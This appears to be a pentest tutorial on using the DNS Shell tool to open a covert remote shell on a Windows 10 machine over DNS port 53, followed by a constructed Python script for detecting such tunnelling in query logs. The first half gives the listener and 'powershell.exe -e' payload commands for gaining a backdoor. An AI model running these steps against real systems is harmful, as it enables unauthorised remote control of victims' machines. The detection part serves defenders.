The DNS protocol runs at the application layer of the TCP/IP model. When an attacker or pentester exploits DNS together with an RCE (Remote Command Execution) vulnerability, the destination server acts as the backdoor.
DNS Shell is a Python-based exploitation tool used to compromise a server and to maintain access to it via command and control.
Here I have used Kali Linux (attacker machine) and Windows 10 (victim machine).
- Download the DNS SHELL tool HERE
- Execute the command: python DNS-Shell.py
- It can be used in two modes: recursive mode (it runs with the DNS name) and direct mode (it runs with the IP address provided, here the Kali Linux IP).
Generating Payload – DNS Shell
- The figure above shows recursive mode.
- Recursive command executed: python DNS-Shell.py -l -r <Domain Name>
NOTE: Command to be executed for direct mode: python DNS-Shell.py -l -d
- The figure above shows that recursive mode has generated the payload.
- Run and execute the command from CMD: powershell.exe -e <Copy and paste the Generated Payload HERE>
BACK TO ATTACKER'S MACHINE
- Once the payload is executed on the victim's machine, a shell on the Windows 10 machine is obtained.
- The figure above shows that the destination (Windows 10) now acts as a backdoor: the command is entered and carried over a covert channel on DNS port 53.
Happy Hacking!!!
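From the defender's side, a command channel carried over port 53 in recursive mode shows up in resolver logs as one client sending many distinct, long, encoded-looking subdomains under a single parent domain. The following is an added example, not part of the original post or of the DNS Shell tool, that flags that pattern in a query log. The log lines, IP addresses, domain names and thresholds are constructed, and the parent domain is assumed to be the last two labels of the name.

```python
import math
from collections import defaultdict

B32 = "abcdefghijklmnopqrstuvwxyz234567"

def fake_label(i, length=24):
    """Constructed stand-in for an encoded data chunk (24 distinct base32 chars)."""
    return "".join(B32[(i * 7 + j * 5) % 32] for j in range(length))

# Constructed sample query log: (client IP, queried name). All values are placeholders.
SAMPLE_LOG = [
    ("192.0.2.20", "www.example.com"),
    ("192.0.2.20", "mail.example.com"),
    ("192.0.2.20", "a-long-but-readable-hostname.example.org"),
    ("192.0.2.10", "www.example.com"),
] + [("192.0.2.10", f"{fake_label(i)}.tunnel-demo.example") for i in range(8)]

def entropy(s):
    """Shannon entropy of a string in bits per character."""
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))

def split_name(qname, parent_labels=2):
    """Split a query name into (subdomain part, parent domain)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-parent_labels]), ".".join(labels[-parent_labels:])

def find_tunnel_candidates(log, min_unique=5, min_len=20, min_entropy=3.5):
    """Return (client, parent, count) for clients sending many distinct
    long, high-entropy subdomains under one parent domain."""
    seen = defaultdict(set)
    for client, qname in log:
        sub, parent = split_name(qname)
        if sub:
            seen[(client, parent)].add(sub)
    hits = []
    for (client, parent), subs in seen.items():
        odd = [s for s in subs
               if len(s) >= min_len and entropy(s.replace(".", "")) >= min_entropy]
        if len(odd) >= min_unique:
            hits.append((client, parent, len(odd)))
    return sorted(hits)

if __name__ == "__main__":
    for client, parent, n in find_tunnel_candidates(SAMPLE_LOG):
        print(f"{client} sent {n} distinct encoded-looking names under {parent}")
```

A single long hostname, like the readable one in the sample, does not trigger the rule; the count of distinct names per client and parent domain is what separates a channel from ordinary lookups.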